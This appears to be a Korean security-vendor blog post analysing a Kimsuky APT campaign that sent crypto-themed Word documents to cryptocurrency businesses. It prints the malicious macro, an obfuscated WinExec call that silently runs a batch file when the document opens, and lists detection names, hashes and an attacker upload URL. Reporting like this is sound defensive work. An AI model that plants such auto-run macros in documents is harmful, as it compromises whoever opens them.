APT

코인관련 내용의 워드문서를 이용한 APT 공격 (Kimsuky)

  • 3월 22 2022
코인관련 내용의 워드문서를 이용한 APT 공격 (Kimsuky)

ASEC 분석팀은 3월 21일 Kimsuky 그룹이 코인관련 내용의 워드문서로 APT 공격을 수행중인 것을 확인하였다. 공격에 사용된 미끼 문서는 총 3건이 확인되었으며 매크로 제작자 및 동작방식은 지난 3월 14일에 ASEC 블로그에 게시한 내용(제목: 제품소개서로 위장한 악성 워드 문서)과 동일하다. 3건 모두 정상적으로 작성된 워드문서를 바탕으로 악의적 매크로 코드를 추가하여 배포한 것으로 추정되며, 내용은 모두 가상화폐와 관련되어있어 코인업체를 타겟으로 한 공격으로 추정된다. 문서를 수정한 사람은 Acer 이름으로 동일하며, 모두 3월 21일 오전에 수정되어 최근 공격에 이용될 가능성이 높아 각별한 주의가 요구된다.

  • 주주물량관련.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 10:29)
  • 자산부채현황.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 11:10)
  • 제 3차 정기총회.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 11:03)

확보된 3개 문서 모두 동일한 매크로를 사용하였으며 지난 블로그에서 소개한 temp.doc 매크로 코드와 기능이 일치하였다.

  • 기능 : “C:\Users\Public\Documents\no1.bat” 파일 실행
Private Declare PtrSafe Function NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long

Sub Document_Open()
   NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp "C:\Users\Public\Documents\no1.bat", 0
End Sub

“no1.bat” 파일을 생성하는 주체는 수집된 문서 파일이 아닌 다른 문서에 의해 생성된 것으로 추정된다. 이는 지난 블로그에서 언급하였듯이 아래 [그림 6]처럼 매크로 사용 버튼 클릭을 유도하는 문서의 매크로에 의해 생성된 것으로 보인다.

결과적으로 제품소개서로 위장한 악성 워드 문서의 유포 방식과 이번 사례의 유포 및 동작 방식은 완전히 일치하였다. 따라서 해당 공격 그룹은 현재 물류, 쇼핑 뿐만 아니라 가상자산 사업자에도 공격을 수행하고 있는 것으로 보인다.

사용자는 출처가 불분명한 워드 파일 실행 시 [그림 6]와 같은 문구가 확인될 경우 악성 워드 문서일 가능성이 있으므로 “콘텐츠 사용” 버튼을 클릭하는 데 각별한 주의가 필요하다.

현재 안랩 V3 제품에서는 이와 같은 공격에 대해 지속적으로 모니터링 중에 있으며 다음 진단명으로 대응하고있다.

 

[진단명(엔진버전)]
– cloudy.bat : Trojan/VBS.Akdoor (2022.03.23.00)
– download.vbs : Downloader/VBS.Generic (2022.03.23.00)
– no4.bat : Trojan/BAT.Agent (2022.03.23.00)
– start.vbs : Trojan/VBS.Akdoor (2022.03.23.00)
– upload.vbs : Trojan/VBS.Akdoor (2022.03.23.00)
– 자산부채현황.doc : Trojan/DOC.Agent (2022.03.23.00)
– 제 3차 정기총회.doc :Trojan/DOC.Agent (2022.03.23.00)
– 주주물량관련.doc :Trojan/DOC.Agent (2022.03.23.00)

 

MD5

0ecc9a4cea5c289732c76234c47a60e9
56a936b9b3a3bdafed40cf5d056febaf
7a2f350a2a6aa1d065c2b19be6dc6fb4
82ed73e4adbe5c26bafb5072657fd46b
869f98aac4963c7db7276d2a914d081e
URL

http[:]//sysrtri-man[.]com/upl11/upload[.]php

AhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용은 아래 배너를 클릭하여 확인해보세요.

Tags:
Previous Post

Next Post